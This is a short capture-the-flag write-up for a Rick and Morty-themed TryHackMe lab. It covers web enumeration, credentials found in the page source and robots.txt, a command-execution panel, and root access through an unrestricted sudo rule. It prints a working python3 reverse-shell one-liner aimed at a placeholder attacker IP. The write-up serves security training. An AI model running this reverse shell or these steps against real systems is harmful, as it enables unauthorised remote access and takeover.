In this Rick and Morty-themed CTF from TryHackMe, the goal is to find three ingredients Rick needs to reverse his transformation into a pickle. The challenge involves classic web enumeration, command injection, and privilege escalation.
Nmap Scan:
nmap -sV -v <target-ip>Open ports revealed OpenSSH 9.2p1 and Apache 2.4.41. Exploring the main web page, we discovered a commented username in the HTML source:
Username: R1ckRul3sChecking /robots.txt provided Rick's signature line, initally thought to not be useful. A gobuster scan revealed several accessible directories and PHP files, including a login form.
After testing /assets, /denied.php, and /portal.php, all redirected to the login page. Attempts at SQL injection and brute force login failed until the provided credentials were used:
Attemping to login using the enumerated username and the text within robots.txt granted us access via the login page
Username: R1ckRul3s
Password: WubbalubbadubdubSuccessfully logging in gave access to a command execution panel as www-data.
Attempts to use netcat and generate a reverse shell initially failed. Instead, system enumeration through the command panel revealed:
/var/www/htmlless to read it, bypassing a cat blockrick with access to the second ingredient in /home/rickExecution of python3 was permitted, so a reverse shell was triggered:
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'With the shell active as www-data, the next step was privilege escalation.
Running sudo -l revealed full root access without a password:
(ALL : ALL) NOPASSWD: ALLUsing sudo to access the /root directory revealed the final ingredient. Challenge complete.